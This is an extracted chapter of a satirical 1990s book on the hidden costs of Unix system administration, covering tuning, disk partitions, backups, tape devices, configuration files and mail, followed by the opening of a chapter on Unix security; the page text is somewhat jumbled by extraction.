affectionately known as a Sysadmin. But unlike these . A Unix sysadmin’s job isn’t fundamentally different from sysadmins who oversee IBM mainframes or PC-based Novell networks. Shutting down the system to install new hardware. Helping users out of jams. Installing new software. Administrating user accounts. The sysadmin’s duties include: • • • • • • • • Bringing the system up. Performing routine backups. InfoWorld All Unix systems require a System Administrator. a Rolls-Royce would today cost $100. Tuning the system for maximum performance. and explode once a year killing everyone inside.11 System Administration Unix’s Hidden Cost If the automobile had followed the same development as the computer. get a million miles per gallon. Overseeing system security. —Robert Cringely.
According to one estimate. The thesis of this chapter is that the economics of maintaining a Unix system is very poor and that the overall cost of keeping Unix running is much higher than the cost of maintaining the hardware that hosts it. Unix makes these tasks more difficult and expensive than other operating systems do. unix keeps me up for days at a time doing installs. date: from: to: subject: wed.222 System Administration other operating systems. reinstalls. were responsible for generating various of the following: mail loops. including all the addresses and dates in various fields. i’ve been assaulted. and apparently taking particular joy in savaging my file systems at the end of day on friday. But this person doesn’t spend full time keeping everything running smoothly. Networked Unix workstations require more administration than standalone Unix workstations because Unix occasionally dumps trash on its networked neighbors. frustrated. insulted. Of course. making system administration a career with a future. and mysterious and arbitrary revisions of my mail headers. please. 5 jun 91 14:13:38 edt bruce howard <bhoward@citi. my expressions are no longer regular. This person often has another job or is also a consultant for many applications.umich. or worse. keeping Unix’s entropy level down to a usable level. every 10-25 Unix workstations shipped create at least one full-time system administration job. repeated unknown error number 1 messages. my girlfriend has left me (muttering “hacking is a dirty habit. a similar network of Macs or PCs also requires the services of a person to perform sysadmin tasks. and emotionally injured by sendmail processes that fail to detect. Some Unix sysadmins are overwhelmed by their jobs. help me. unix is hacker crack”) and i’ve forgotten where my shift key lives. reboots. despair is my companion. .edu> unix-haters my story over the last two days i’ve received hundreds and hundreds of “your mail cannot be delivered as yet” messages from a unix uucp mailer that doesn’t know how to bounce mail properly. reformats. i’m begging you.
a sysadmin sits in front of a TV reading netnews while watching for warnings. errors. it becomes clear that the allegedly cost-effective “solution” of “open systems” isn’t really costeffective at all. the default SCO installation includes a cron script that removes cores from /usr/spool/uucp.com (Alan H. In fact.unix.000 a year to maintain 20 machines translates into $2000 per machine-year.UUCP (Don Glover) writes: For quite some time now I have been getting the message from uucp cores in /usr/spool/uucp. Keeping Unix Running and Tuned Sysadmins are highly paid baby sitters.xenix. Large networks of Unix systems don’t like to be . The release notes for SCO HDB uucp indicate that “uucico will normally dump core.sco In article <2495@polari. Baby sitters waste time by watching TV when the baby isn’t actively upset (some of them do homework). Mintz) Re: uucp cores comp. I rm it and it comes back… Yup. Some systems have so much diarrhea that the diapers are changed automatically: Date: From: Subject: Newsgroups: 20 Sep 90 04:22:36 GMT alan@mq.UUCP>. starts to stink. Without an experienced sysadmin to ferret them out. Combine these costs with the cost of the machines and software. temporary files that aren’t. gets uncomfortable. and complains or just dies. sure enough I go there and there is a core. corwin@polari.Keeping Unix Running and Tuned 223 Paying someone $40. cancerous log files. Unix plays hide and seek with its waste. Typical low-end Unix workstations cost between $3000 and $5000 and are replaced about every two years. Unix drops excrement all over its file system and the network in the form of core dumps from crashing programs. the system slowly runs out of space. Just as a baby transforms perfectly good input into excrement. But unlike the baby. who may smear his nuggets around but generally keeps them in his diapers. and user complaints (some of them also do homework).” This is normal. which it then drops in its diapers. and illegitimate network rebroadcasts.
so vital for third-party application developers. 29 Feb 1992 17:30:41 PST Richard Mlynarik <mly@lcs.mit. bugs usually don’t get fixed (or even tracked down). runs it. or months at a time. and slow corruption of their address space—problems that typically only show themselves after a program has been running for a few days. and then suddenly fails. Date: From: To: Subject: Sat. The difficulty of attaching a debugger to a running program (and the impossibility of attaching a debugger to a crashed program) prevents interrogating a program that has been running for days. Compounding the problem is how Unix utilities and applications (especially those from Berkeley) are seemingly developed: a programmer types in some code. compiles it. garbage accumulation. It was not designed to stay up for weeks at a time. Not Years Unix was developed in a research environment where systems rarely stayed up for several days. Production-style quality assurance. let alone continuously. Programs that don’t crash are presumed to be running correctly. Unix Systems Become Senile in Weeks. it simply doesn’t catch code-cancers that appear in production code that has to remain running for days.edu> UNIX-HATERS And I thought it was the leap-year So here I am. weeks. who frequently dials up the system from home in the evening to burp it. While this approach suffices for a term project in an operating systems course. It’s not surprising that most major Unix systems suffer from memory leaks.224 System Administration far from their maternal sysadmin. and waits for it to crash. As a result. and periodically rebooting Unix is the most reliable way to keep it from exhibiting Alzheimer’s disease. wasn’t part of the development culture. losing with Unix on the 29th of February: % make -k xds sh: Bus error make: Fatal error: The command `date "+19%y 13 * %m + 32 * %d + 24 * %H + 60 * %M + p" | dc' returned status `19200' .
Some parameters are important. debugger-debugging fun. which set the maximum amount of some system resource. Some of these parameters. one hour.so. The way I discovered this was when the ispell program told me: swap space exhausted for mmap data of /usr/lib/libc. in a blinding flash. aren’t present in more advanced operating systems that dynamically allocate storage for most system resources. A sysadmin’s job includes setting default parameters to the correct values (you’ve got to wonder why most Unix vendors don’t bother setting up the defaults in their software to match their hardware configurations). hand-patching your operating fix with a debugger. disheartening examination?—shows that the actual bug is that this machine has been up too long. pointless. and ten minutes of core-dumping.6 is not a known word Now. . such as the relative priority of system processes. it became clear that in fact the poor machine has filled its paging space with non-garbage-collected. System tuning sometimes requires recompiling the kernel. if you have one of those commercial “open systems” that doesn’t give you the sources. noncompactible twinkie crumbs in eleven days. inconclusive. of course. or. but further examination—and what example of unix lossage does not tempt one into further.1.” Entire books have been written on the subject. Average users and sysadmins often never find out about vital parameters because of the poor documentation. is that the version of Unix he was using had not already decided to reboot itself. This process is called “system tuning.Keeping Unix Running and Tuned 225 Compilation exited abnormally with code 1 at Sat Feb 29 17:01:34 I was started to get really worked-up for a flaming message about Unix choking on leap-year dates. It is well past TIME TO BOOT! What’s so surprising about Richard Mlynarik’s message. You Can’t Tune a Fish Unix has many parameters to tune its performance for different requirements and operating conditions.
I have this Sparcstation ELC which I bought for my personal use in a moment of stupidity. I hear from the spies out on abUsenet (after looking at the paging code and not being able to find anything) that there’s this magic parameter in the swapping part of the kernel called maxslp (that’s “max sleep” for the non-vowel-impaired) that tells the system how long a process can sleep before it is considered a “long sleeper” and summarily paged out whether it needs it or not. No. whirr. it still has 3 or 4 MB free! Well. here’s the deal. and indeed. very experienced sysadmins (those with a healthy disrespect for Unix) can win the battle. Date: From: To: Subject: Tuesday. So if I walk away from my Sparcstation for 20 seconds or take a phone call or something.edu> UNIX-HATERS what a stupid algorithm I know I’m kind of walking the thin line by actually offering useful information in this message. tops. rattle. why did they get paged out in the first place? It’s not like the system needed that memory—for chrissake. xterms. Why is it that when I walk away from my trusty jerkstation for a while and come back.mit. rattle. I run 12 to 13MB of memory usage. So it has a lot of free memory to fire up new processes in or use as buffer space (for I/O from processes that have already been . a few Emacses.226 System Administration Fortunately. The default value for this parameter is 20. all my processes get swapped back into memory? I mean. running Ecch Windows. you only live once. It has a 760MB hard disk and 16MB of memory. But I didn’t come here today to talk about why 2 emacses and a window system should take five times the total memory of the late AI KS-10. right? Anyway. whirr. but what the heck. 1993 2:17AM Robert E. it very helpfully swaps out all of my processes that are waiting for keyboard input. January 12. today I came to talk about the virtual memory system. pstat reports that on a typical day. and the occasional xload or xclock. Seastrom <rs@ai. I touch the mouse and all of a sudden. I figured that 16MB ought to be enough.
Before loading Unix onto your disk. is there? feh. and there is absolutely nothing to be gained by summarily paging out stuff that you don’t have to just so you have a lot of empty memory lying around? What’s that. who “solves” the problem by rebooting the . Disk partitions are touted as hard disk quotas that limit the amount of space a runaway process or user can use up before his program halts. Disk Partitions and Backups Disk space management is a chore on all types of computer systems. This “feature” masks a deficient file system that provides no facilities for placing disk quota limits on directories or portions of a file system. instead.000. if the system is not out of memory. Every alleged feature of disk partitions is really there to mask some bug or misdesign. which let you create a larger logical disk out of a collection of smaller physical disks. as opposed to other systems like TOPS-20. For example. no doubt). you must decide upon a space allocation for each of Unix’s partitions. These “features” engender further bugs and problems. right. which. So I used that king of high performance featureful debugging tools (adb) to goose maxslp up to something more appropriate (like 2. Unix pretends your disk drive is a collection of smaller disks (each containing a complete file system). they just proceed merrily along. Damnit. Spiffy.000. it’s a Herculean task. it’s not 1983. thus causing most other processes that require temporary disk space to fail. disk partitions allow you to dump or not dump certain sections of the disk without needing to dump the whole disk. you say? Oh. require a sysadmin (and additional. But this “feature” is only needed because the dump program can only dump a complete file system.000). In comes the sysadmin. writing your email to a full disk. not surprisingly. recurring costs) to fix.Disk Partitions and Backups 227 swapped out. I forgot—Sun wants their brand new spiffy fast workstations to feel like a VAX 11/750 with 2MB of RAM and a load factor of 6. Most Unix programs don’t check whether writes to disk complete successfully. on Unix. Unix commonly fails when a program or user fills up the /tmp directory. Nothing like nostalgia. then it shouldn’t page or swap! Period! Why doesn’t someone tell Sun that their workstations aren’t Vaxen with 2MB of RAM.
though swapping to the file system is much slower. and then reload the whole system from tape. It’s a relatively expensive solution. So Unix does progress a little. and then reload the whole system from tape. Others do it wrong and insist on a fixed file for swapping. it gets cranky. The swap partition is another fixed size chunk of disk that frequently turns out not to be large enough. That space so carefully reserved in the partition for the one or two times it’s needed can't be used for things such as user files that are in another partition. Windows on your workstation vanish without a trace. then repartition your disk to make /swap bigger. It sits idle most of the time. More downtime. as well as to a swap partition. more cost. Some Unix venders do it right. But it no longer makes sense to have the swap size be a fixed size. But no matter how big you make /tmp. Making a “large” partition containing the /tmp directory. What can you do? Get your costly sysadmin to dump your whole system to tape (while it is single-user. In the old days. it made sense to put the entire swap partition on a single fast. of course).228 System Administration system because the boot process will clear out all the crud that accumulated in the /tmp directory. Adding a new program (especially an X program!) to your system often throws a system over the swap space limit. a user will want to sort a file that requires a a temporary file 36 bytes larger than the /tmp partition size. but much easier to implement than fixing Unix. . It also wreacks havoc with incremental nightly backups when using dump. which helps a bit. (Sound familar?) The problem of fixed size disk partitions still hurts less now that gigabyte disks are standard equipment. which is more flexible than reformatting the disk to change swap space but inherits all the other problems. disks are cheap these days. It kills processes without warning. Want to fix the vanishing process trick problem by increasing swap space? Get your costly sysadmin to dump your whole system to tape (while it is single-user. and let the paging system dynamically eat into the filesystem up to a fixed limit. More downtime. So now you know why the boot process cleans out /tmp. then repartition your disk to make /tmp bigger (and something else smaller. when disks were small. Does Unix get unhappy when it runs out of swap space? Does a baby cry when it finishes its chocolate milk and wants more? When a Unix system runs out of swap space. and fast disks were much more expensive than slow ones. unless buying an additional disk). Hey. just moves the problem around: it doesn’t solve anything. of course). The system gives up the ghost and panics. It’s a shell game. Some Unix vendors now swap to the file system. for the times when a program may actually need all that space to work properly. more cost. The manufacturers ship machines with disk partitions large enough to avoid problems. small drive.
the disks with the most activity get the most corrupted. When Unix crashes. because those are the most inconsistent disks—that is. smaller. Partitions: Twice the Fun Because of Unix’s tendency to trash its own file system. “Here’s your rk05. The originalversion of Unix sent outside of Bell Labs didn’t come on distribution tapes: Dennis Ritchie hand-built each one with a note that said. (Of course. Dennis. The rational behind disk partitions is to keep enough of the operating system intact after a system crash (a routine occurrence) to ensure a reboot (after which the file system is repaired). If the system crashes. By the same reasoning. dividing a single physical disk into several. they had the greatest amount of information in memory and not on the disk. since you needed the operating system for recovery. The file system gets trashed because the free list on disk is usually inconsistent. it was better to have a crashing Unix corrupt a user’s files than the operating system.” (The rk05 was an early removable . each with its own file system. and you get lucky. early Unix gurus developed a workaround to keep some of their files from getting regularly trashed: partition the disk into separate spaces. Another additional cost of running a Unix system. virtual disks. The gurus decided to partition the disks instead. only half your data will be gone.Disk Partitions and Backups 229 frequently tripling or quadrupling the tape used for backups. the fact that the user’s files are probably not backed up and that there are copies of the operating system on the distribution tape have nothing to do with this decision. Love.
“Politics of UNIX. When more than one user uses “their” disk space. This error lay dormant because the VAX had so much memory that swapping was rare. A day later.230 System Administration disk pack. and you waste space for the 99% of the time that you aren’t running 800-megabyte quantum field dynamics simulations. The system administrators (a group of three undergraduates) eventually discovered that the “c” partition on disk #2 overlapped with another partition on disk #2 that stored user files. 1 Andy Tannenbaum. They noticed that the “c” partition on disk #2 was unused and gave Unix permission to use that partition for swapping. “If Unix crapped on your rk05. There are two simple rules that should be obeyed when partitioning disks:2 1. it corrupted the file system—usually resulting in a panic. In 1985.) recommends that disks be equipped with only a single partition. When it did.) According to Andy Tannenbaum. did the VAX swap to the “c” partition on disk #2. the VAX crashed again. rather than requiring a special preallocated space on the system’s hard disk.” Washington. requiring lots of memory. disaster will result. you’d write to Dennis for another. A few weeks later the VAX crashed with a system panic. 13) 2 Indeed. Each partition must be allocated for only one purpose. 1984. Only after a new person started working on a large imageprocessing project. Partitions must not overlap. This is probably because NeXT’s Mach kernel can swap to the Unix file system. . Early Unix didn’t use the file system for swapping because the Unix file system was too slow. A day or two after that. 2. Inc. or the swap partition is too large. (Reprinted from a reference in Life With Unix. Unix will act like an S&L and start loaning out the same disk space to several different users at once. p. and your Unix craps out when you try to work on problems that are too large. DC USENIX Conference. Otherwise. The problem with having a swap partition is that the partition is either too small. the MIT Media Lab had a large VAX system with six large disk drives and over 64 megabytes of memory.”)1 Most Unix systems come equipped with a special partition called the “swap partition” that is used for virtual memory. there are so many problems with partitioning in Unix that at least one vendor (NeXT. somebody who had stored some files on disk #2 reported file corruption.
Unfortunately. but that doesn’t help you. The Computer Systems Research Group. I’ll check to see what the latest tape we have is. If the stuff you had on /bflat was not terribly recent we may be able to get it back from tapes. I’m afraid.edu File Systems mt@media-lab.Disk Partitions and Backups 231 A similar problem happened four years later to Michael Travers at the Media Lab’s music and cognition group. The stuff that was there is gone for good. Backups are also normally performed each night for any files that have changed during the day. Mon.1 .edu Down and Backups Disk-based file systems are backed up regularly to tape to avoid data loss when a disk crashes.4bsd.ucb-fixes Organization: University of California at Berkeley We recently had problems with the disk used to store 4BSD system bug reports and have lost approximately one year’s worth. I could find no way to reconstruct the file systems. 13 Nov 89 22:06 EST saus@media-lab. all the files on the disk are copied to tape once a week.bugs. I feel bad about it and I'm sorry but there’s nothing I can do about it now.CS. The file systems overlapped and each one totally smashed the other. Typically. I made an error when I constructed the file systems /bflat and /valis.BERKELEY.95 (Lost bug reports) Date: 18 Feb 92 20:13:51 GMT Newsgroups: comp. We would very much appreciate the resubmission of any bug reports sent to us since January of 1991. Here’s a message that he forwarded to UNIX-HATERS from one of his system administrators (a position now filled by three full-time staff members): Date: From: Subject: To: Mike. From: bostic@OKEEFFE. there’s no guarantee that Unix backups will save your bacon. or at least once a month. Unfortunately.mit. I have repaired the problem.mit.EDU (Keith Bostic) Subject: V1.
Unix is not a serious option for applications with continuous uptime requirements. where there will not be any processes on the system changing files on disk during the backup.1 (DIKUSUN4CS) #2:Sun Sep 22 20:48:55 MET DST 1991 --. Because Unix lacks facilities to backup a “live” file system. with similar results: the most important files—the ones that people were actively modifying—are the ones you can’t restore. Since the dump isn’t instantaneous (and usually takes hours).1.00-12.00-13. who said “As far as I can tell.00 -------------------------------------------------------------------- 1 This message is reprinted without Keith Bostic’s permission. Sep.232 System Administration One can almost detect an emergent intelligence. . If there are any users or processes modifying files during the backup. which is always.” Unix managed to purge from itself the documents that prove it’s buggy. 9. Sep.) Clearly. Sep. (With a sysadmin getting paid to watch the tapes whirr.” He’s right: the backups. The backup program takes a snapshot of the current file system. Aug. a proper backup requires taking the system down to its stand-alone or single-user mode. 9. 9. made with the Berkeley tape backup program.00-12. Aug.00-13. this translates into hours of downtime every day. It’s similar to photographing the Indy 500 using a 1 second shutter speed. the file system on disk will be inconsistent for short periods of time.00 systems during the backups. [reprinting the message] is not going to do either the CSRG or me any good. 9. One set of Unix systems that desired continuous uptime requirements was forced to tell their users in /etc/motd to “expect anomalies” during backup periods: SunOS Release 4. were also bad.00-12. When the system crashes before updating the disk with all the appropriate changes.00 Please note that anomalies can Freja & Ask: 31. Rimfaxe: 14.00 be expected when using the Unix Odin: 7. Unix’s method for updating the data and pointers that it stores on the disk allows inconsistencies and incorrect pointers on the disk as a file is being created or modified. Many Unix sysadmins don’t realize that inconsistencies occur during a system dump to tape.00 Div. 9. The corruption is visible during the reboot after a system crash: the Unix boot script automatically runs fsck to put the file system back together again.BACKUP PLAN ---------------------------------------------------Skinfaxe: 24. For systems with gigabytes of disk space. the file system image on disk becomes corrupt and inconsistent. the snapshot becomes a blurry image. Sun4c: 21. as in “Colossus: The Forbin Project.
Not a chance in the Berkeley version of Unix. asks you to replace the tape with a new one. Unix considers an entire tape unusable if it can’t write on one inch of it. you give up completely. you recopy the page and continue. buy a new ream of paper. 30 May 91 18:35:57 PDT From: Gumby Vinayak Wallace <gumby@cygnus. destroy the evil tape.Disk Partitions and Backups 233 Putting data on backup tapes is only half the job. so you buy a new ream of paper. Yep. retrieves only the first file it matches. Instead of a single name like “tape. there will be a small imperfection on a tape that can't be written on. then type a magic command to set the tapes spinning. For getting it back. like a real Unix guru. and start over. Berkeley Unix blesses us with its restore program. when passed to the restore program. beware.” Unix uses a different name . But if you want to restore the files from the command line. not paper. Occasionally. more robust operating systems. Other. If you are Unix. Restore has a wonderful interactive mode that lets you chdir around a phantom file system and tag the files you want retrieved. Unix happily reports the bad spot. The Unix way translates into lost time and money. Unix uses magnetic tape to make copies of its disks. and you've successfully copied the first 499 pages. They skip over the bad spot when they reach it and continue. You might think that something as simple as /dev/tape would be used. You want a perfect copy. can use these “bad” tapes. but the analogy is extremely apt. More Sticky Tape Suppose that you wanted to copy a 500-page document. Date: Thu. Even if the document is 500 pages long. and copy the document one page at a time. Sometimes Unix discovers this after spending a few hours to dump 2 gigabytes. What do you do if you find a page with a smudge? If you have more intelligence than a bowling ball. not every matching file! But maybe that’s considered featureful “minimalism” for a file system without backup bits. No kidding. Unix names a tape many ways.com> To: UNIX-HATERS Subject: Unix’s Berkeley FFS Have you ever had the misfortune of trying to retrieve a file from backup? Apart from being slow and painful. making sure each page is perfect. someone here discovered to his misfortune that a wildcard. It encodes specific parameters of tape drives into the name of the device specifier. and start over.
/dev/st8 is actually /dev/st0. Same drive. You or your sysadmin may have just spent an hour or two creating a tar or dump tape of some very important files on drive 0. The only way around this is to deny everybody other than the system operator access to the tape drive. different name. Unix boasts dozens of files. So much for portability. and /dev/st9 is /dev/st1. if you are very . yielding names like /dev/mt. suppose your system has two tape drives. A program opens and closes the tape device many times during a dump. Prefix the name with an “r” and it tells the driver it is a raw device instead of a block mode device. don’t let these numbers fool you. Random down the hall has a tape in drive 1. any other user on the system can use the tape drive. But wait. Change the interface and your sysadmin earns a few more dollars changing all his dump scripts. each requiring an exact combination of letters and hieroglyphics for proper system configuration and operation. sometimes (undocumented) tabs. Each Unix configuration file controls a different process or resource. lest they risk anaphylactic shock. the names /dev/st0. every Unix site uses custom scripts to do their dumps. and each has its own unique syntax. huh? Because Unix doesn’t provide exclusive access to devices. programs play “dueling resources. and /dev/st. Dump scripts? Yes. Mr. and no one can remember the proper options to make the dump program work. Each time the file is closed. He mistypes a 0 instead of a 1 and does a short dump onto drive 0. Unix appends a unit number. /dev/nrst0. The recording density is selected by adding a certain offset to the unit number. /dev/nrst8. called /dev/rst0 and /dev/rst1. However. there’s more! Prefix the name with an “n” and it tells the driver not to rewind the tape when it is closed. /dev/rst0. Field separators are sometimes colons. Unix “security” controls are completely bypassed in this manner. To those names. Q. because vendors frequently use different tape drive names. and /dev/st16 all refer to the same device.” a game where no one ever comes out alive. So. Mind boggling. Those allergic to Microsoft Windows with its four system configuration files shouldn’t get near Unix. destroying your dump! Why does this happen? Because Unix doesn’t allow a user to gain exclusive access to a tape drive. A tape online with private files can be read by anybody on the system until taken off the drive. /dev/xt.234 System Administration for each kind of tape drive interface available. sometimes spaces. and. like /dev/st0 or /dev/st1. As a simple example. Configuration Files Sysadmins manage a large assortment of configuration files. J.
conf /etc/domainname /etc/hosts /etc/fstab /etc/exports /etc/uucp/Systems /etc/services /etc/printcap /etc/networks /etc/aliases /etc/bootparams /etc/format. 21 Sep 92 12:03:09 EDT SYSTEM-HACKERS@ai. Rarely will it gracefully exit and report the exact problem.boot /etc/rc. but we should make sure that there isn't some automatic daemon overwriting the thing every night. or how. It’s fixed now (I think). If you choose the wrong separator. havoc results that is hard to track down. but when they err. he is referring to his job. the program reading the configuration file will usually silently die.edu Muesli printcap Somehow Muesli’s printcap entry got overwritten last night with someone else’s printcap.mit.cf /etc/shells /etc/syslog. whitespace. was told that it should spawn a child to connect to itself every time someone tried to spool to Thistle or did an lpq on it. or ignore the rest of the file. lpd. Twenty machines are about tops for most servers. . which they inflict on who when. Beware of the sysadmin claiming to be improving security when editing these files. Shells scripts are written to automate this process. I can’t keep track of who has what copy of which.conf /etc/termcap /etc/uucp/Dialcodes Multiple Machines Means Much Madness Many organizations have networks that are too large to be served by one server. both with respect to new releases and with respect to configuration files.edu> Mon. which is supposed to service Thistle. and Thistle were rather unhappy.mit. A highly paid Unix sysadmin could spend hours searching for the difference between some spaces and a tab in one of the following common configuration files. trash its own data files. Needless to say Muesli.local /etc/inetd. why.dat /etc/group /etc/hosts. System administrators now have the nightmare of keeping all the servers in sync with each other. as the following sysadmins testify: From: Date: To: Subject: Ian Horswill <ian@ai.equiv /etc/uucp/Devices /etc/motd /etc/passwd /etc/protocols /etc/resolv. not your system: /etc/rc /etc/rc.conf /etc/sendmail. A different syntax for each file ensures sysadmin job security. That meant that Muesli’s line printer daemon.Configuration Files 235 lucky.
I only mention this because I’m certain no one will ever fix it. September 24. Getting it to work just right. often takes lots of patience and lots of time: From: Mark Lottor <mkl@nw.xerox. we couldn’t just diff it with the previous version. those lines are both comment lines! A few hours were spent searching the entire file for possible errors. we too use RCS.com> Friday. 1992 2:33PM Recently. In fact. like spaces instead of tabs and such (of course. Why can’t Unix count properly??? Turns out the file has continuation lines (those ending in \).”) The rdist utility (remote distribution) is meant to help keep configuration files in sync by installing copies of one file across the network. Unix weenies probably think it does the right thing. Running rdist produced: fs1:> rdist rdist: line 100: syntax error rdist: line 102: syntax error Of course. however.com> Subject: rdist config lossage Date: Thursday. January 22. Finally. Rdist counts those long lines as a single line. was told that it should spawn a child to connect to itself ” suggests that Unix networking should be called “satanic incestuous whelping. They accidently added an extra paren on the end of a line. It’s such typical Unix lossage: you can feel the maintenance entropy exponentially increasing. the extra paren was found. . Being hackers. on line 110 of the file. we wrote a number of shell scripts and elisp functions to make RCS easier to deal with. which is supposed to service Thistle. since Unix lacks version numbers). someone edited our rdist Distfile. It’s hard to even categorize this next letter: From: Date: To: Subject: Stanley Lanning <lanning@parc. The vocabulary of the statement “the daemon. checking those lines showed no error.236 System Administration (Unix NetSpeak is very bizarre. 1993 11:13AM UNIX-HATERS RCS Being enlightened people.
It turns out that one of the changes to RCS was a shift from local time to GMT. I then discovered that our Emacs RCS package doesn’t work with the latest version of RCS. We also have some HP machines here. compile. One of the great things about Suns (now that they no longer boot fast) is that they are so compatible. so I got the latest sources and built them and got back to work. I then discover that there are multiple copies of the Emacs RCS code floating around here. There’s this big. and they tell you to not use it. ugly script that is used to create an architecture-specific header file. back to work. It won’t run under the Binary Compatibility package. until somebody using the older RCS tried to check out a file I had checked in. and it is. edit. But the RCS configuration script doesn’t read the documentation. Thank you. so RCS ends up using it. and of course I had only fixed one of them. install. It’s there. things like using “echo … | -c” instead of “echo -n …” under Solaris. so it wouldn’t let the other person access the file.” The HP machines don't really support mmap. I just go ahead and fix things and try to get back to work. Why? One of the changes to RCS is an apparently gratuitous and incompatible change to the format of the output from rlog. All seemed OK for a short time. slow. so they needed to have the latest version of RCS. either. So I hack the elisp code and get back to work. The older version of RCS looked at the time stamp and figured that the file didn’t even exist yet. Compile. And it appears to work. Building RCS is a magical experience. install. and back to work. back to work. Turns out the version of RCS we use around here is kinda old and doesn’t run under Solaris. Hack. hack. edit.x. Almost. With other Suns. It tests all sorts of interesting things about the system and tries to do the right thing on most every machine. it just looks to see if it's there.Configuration Files 237 I use Solaris 2. But the latest version of RCS does work in Solaris. Sometimes. compile. hack. While I’m at it I fix a couple of other problems with them. test. Why? Because there are multiple copies of Emacs. test. so that we are all dealing in GMT. instead. Compile. At this point the only thing to do is to upgrade all copies of RCS to the latest. Why? I don't ask why. . it quietly dumps core in some random directory. too. but it doesn’t work. I then discovered that our shell scripts are losing because of this same change. But that's only “appears.
too. Why? It turns out that unlike the rest of us. Not only does the complexity of sendmail ensure employment for sysadmins. not “who am i | awk '{print $1}' | sed ‘s/*\\!//”’ or some such hideous command. I have my fingers crossed. or if Unix were properly docu- . Things work for other people. halt. Hack. hack. Remember those shell scripts that try to make RCS more usable? It turns out there are multiple copies of them. Not $USER (which doesn’t work on the HPs).238 System Administration When somebody running on an HP tries to check out a file. one person can’t use the scripts at all. it ensures employment for trainers of sysadmins and keeps your sysadmin away from the job. So the scripts get hacked again to use the elegant syntax “${LOGNAME:-$USER}. So we look at the results of the configuration script. test. which is a real advertisement from the net. If you do a check out from the newer HP machine everything works just fine. see that it’s using mmap. flaming death. And. and back to work. the scripts use $LOGNAME. cmdtool has a wonderful-wonderful-oh-so-compatible feature: it doesn’t set $LOGNAME. back to work. compile. Just look at Figure 3. but not him. he is attempting to use Sun’s cmdtool. install. hit ourselves in the head. Such courses would be less necessary if there was only one Unix (the course covers four different Unix flavors). It’s been 24 hours since I heard an RCS bug report. edit. of course. it crashes the machine. including the Makefile? And that you have to change the Makefile to build a version of RCS that you can test? And that I have real work to do? Compile. that’s only on the HP machine where the RCS configuration was run. edit the configuration script to not even think about using mmap.” and I get back to work. Panic. reboot. It doesn’t need to be this way. Did I mention that the configuration script takes maybe 15 minutes to run? And that it is rerun every time you change anything. of course (see the mailer chapter). Of course. and of course I only fixed one copy. A couple of days later there is another flurry of RCS problems. Finally. and try again. the most popular Unix mailer. Maintaining Mail Services Sendmail. is exceedingly complex. In fact it seems to go out of its way to unset it.
HP-UX 8. • Create custom sendmail rewriting rules to handle delivery to special addresses and mailers. • Set up a corporate electronic mail domain with departmental sub-domains. ULTRIX 4. and how to debug the sendmail. Funny thing.1. • Debug mail addressing and delivery problems.cf files are discussed. DEC Ultrix 4. Sendmail Seminar Internet Advertisement .1. and AIX 3. Sendmail Made Simple Seminar This seminar is aimed at the system administrator who would like to understand how sendmail works and how to configure it for their environment.1.cf file are covered.2. Set up gateways to the Internet mail network and other commercial electronic mail networks. the cost is even larger if your sysadmin can’t hack sendmail. IBM AIX 3. how to modify the sendmail.0.1 sendmail. A pair of simple sendmail.cf file.1. FIGURE 3. • Understand the function and operation of sendmail. After this one day training seminar you will be able to: • Understand the operation of sendmail. • Debug sendmail.cf files. • Understand the operation of vendor specific sendmail. HP-UX 8. The topics of sendmail operation. • Understand how sendmail works with mail and SMTP and UUCP.2.cf files SunOS 4.cf file. Another hidden cost of Unix.2.cf files for a network of clients with a single UUCP mail gateway are presented.cf configuration files. The SunOS 4. how to read the sendmail.0. All the tasks listed above should be simple to comprehend and perform. because then your mail doesn’t work! Sounds like blackmail.Maintaining Mail Services 239 mented.
I took long lunches and rarely stayed much after 5pm. 20 Dec 90 18:45 CST Chris Garrigues <7thSon@slcs. Now I’m one of four people supporting about 50 Suns.slb. Even with this. I reported bugs to Symbolics and when I wasn’t ignored. I report bugs to Sun and when I’m not ignored. we’re still cleaning up the mess in the environment and it’s full of things that we don’t understand at all. and often before lunch. the fixes eventually got merged into the system. I also take care of our few remaining LispMs and our Cisco gateways. I was single-handedly supporting about 30 LispMs. I’m told that that’s the way it’s supposed to work. so I put in that single weekend to fix the namespace (which lost things mysteriously) and moved things around. including root. impossible at worst. I had time to hack for myself. I even sacrificed my entire Thanksgiving weekend. I always got the daily paper read before I left in the afternoon. It’s better. We have an Auspex. can log in. I work late all the time. There are multiple copies of identical data which we’ve been unable to merge (mostly lists of the hosts at our site). but it seems that in my past. Buying the Auspex brought us from multiple single points of failure to one huge single point of failure.240 System Administration Where Did I Go Wrong? Date: From: To: Subject: Thu. I work lots of weekends. “pwd” still fails and nobody. when the mail server is down. I never stayed after 6pm. Two years later. Until two years ago. Where did I go wrong? . Then things changed. New OS versions cause things to break due to shared libraries. but they don’t require much care. During that year and a half. but that’s just a Sun which was designed to be a server. I worked one (1) weekend. I was doing both hardware and software support. so we’re only doing software. When I arrived. We get hardware support from Sun. I thought the environment was a mess. people frequently didn’t know that a server was down until it came back up. Running multiple version of any software from the OS down is awkward at best.com> UNIX-HATERS Support of Unix machines I was thinking the other day about how my life has changed since Lisp Machines were declared undesirable around here.
Where Did I Go Wrong? 241 .
.
I Didn’t Realize You Were Root Unix is computer-scientology. Thus. except for the vulnerable and ill-designed root/rootless distinction. when Unix is behaving as expected. Its roots as a playpen for hackers and its bag-of-tools philosophy deeply conflict with the requirements for a secure system. The Oxymoronic World of Unix Security Unix’s birth and evolution precluded security. I’m Sorry. Sir. almost by definition. but not as funny— especially when it is your files that are being eaten by the dog. and making Unix run “securely” means forcing it to do unnatural acts. an oxymoron because the Unix operating system was not designed to be secure. —Dave Mankins The term “Unix security” is.12 Security Oh. not computer science. It’s like the dancing dog at a circus. . Security measures to thwart attack were an afterthought. Go Ahead. it is not secure.
the Unix superuser concept is a fundamental security weakness. Nearly all Unix systems come equipped with a special user. every executable program. a wrong setting on a file’s permissions enable catastrophic failures of the system’s entire security apparatus. a misplaced comma. A “securely run Unix system” is merely an accident waiting to happen. As a result. and every start-up script become a critical point.rhosts and /etc/groups). First. The individual elements can even be booby-trapped.244 Security Security Is Not a Line Printer Unix implements computer security as it implements any other operating system service. that circumvents all security checks and has free and total reign of the system. Combining configuration files and small utility programs. A collection of text files (such as . A single error. Unix’s “programmer tools” philosophy empowers combinations of relatively benign security flaws to metamorphose into complicated systems for breaking security. or change any user’s password without an audit trail being left behind. he’s compromised the entire system. . without encryption or other mathematical protections. Because Unix lacks a uniform policy. the only secure Unix system is one with the power turned off. called root. fails when applied to system security. It’s like leaving the keys to your safe sitting on your desk: as soon as an attacker breaks through the Unix front door. which works passably well 